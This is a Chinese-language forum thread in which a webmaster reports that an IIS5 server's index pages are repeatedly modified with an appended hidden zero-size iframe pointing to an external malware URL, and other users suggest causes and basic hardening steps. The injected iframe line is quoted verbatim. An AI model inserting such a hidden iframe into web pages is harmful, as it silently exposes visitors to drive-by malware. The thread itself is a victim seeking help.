我被駭了_請問這是什麼手法,如何防範?謝謝

我的主機網頁被駭了
OS:WIN2000/IIS5
皆巳修補到最新
情況:
在wwwroot目錄下只要是有index.*的檔案皆被
在html原始碼的最後一行皆給你加上
<iframe src=http://www.td-school.org.cn/book/past.htm width=0 height=0></iframe>
才剛全部修改好,並且密碼全改過(20位英文數字混合),隔不到一天又被駭了,快瘋了
請問這個是那裏有漏洞?如何防範?謝謝各位喔!
2007-06-25 21:09 發佈
文章關鍵字 手法
三叉戟 wrote:
我的主機網頁被駭了O...(恕刪)


木馬?
密碼被監聽?
我的網頁大概有30、40個index.*的檔案(分散在不同目錄)
看被駭的時間幾乎在1分鐘內皆被改完(只有最後一行加上程式碼)
(我改回來就要半小時以上)
會不會是網路機器人幹的?
我也用spyboot和卡巴掃過了
還是被駭…
檢查一下
系統裡是不是已經暗藏不明的帳號
所有網頁檔案的存取權限設定是否恰當, 是否有不明的網頁程式
查閱 web log 是否有可疑的存取記錄
關閉不必要的服務
且建議至少要有簡單的防火牆擋在前面
通常hack的途徑不外乎
1.破解密碼
2.植入木馬
3.鑽系統漏洞

1.你PW全都改過且又20幾個位數...基本上應該不是密碼破解入侵
2.還是要回歸基本,先檢查有無不明系統帳號、有無異常權限、有無異常的服務PORT被開啟...等
3.這是最有可能的...再怎樣強大的防火牆 是擋不了系統本身的漏洞的,有錢的話 換成最新的OS+web ap是最好的
症狀跟熊貓燒香的病毒相同,不過跟我印象中的植入網址不同。
根據網路上找到的資料說是利用Windows的漏洞,不過之前Server中毒時其實也一直都有在做Windows Update。

不過我可慘了,Server上是數千隻的asp檔案.....
Canon EOS 30D + 17-85 IS, 10-22, 55-250 IS, Tamron 18-270 VC, 135 F2L, S 30mm F1

k750iii wrote:
再怎樣強大的防火牆 是擋不了系統本身的漏洞的,有錢的話 換成最新的OS+web ap是最好的


看到IIS我就頭皮一陣發麻...連我們部門架內部網站(wiki, mantis等等)我都堅持不用IIS(雖然OS是windows 2003).

老話一句, 沒有盲腸就沒有盲腸炎.....
與失敗為伍者,天天靠盃都是別人的錯。 與成功為伍者,天天跟失敗切磋直到不再出錯。
內文搜尋
X
評分
評分
複製連結
Mobile01提醒您
您目前瀏覽的是行動版網頁
是否切換到電腦版網頁呢?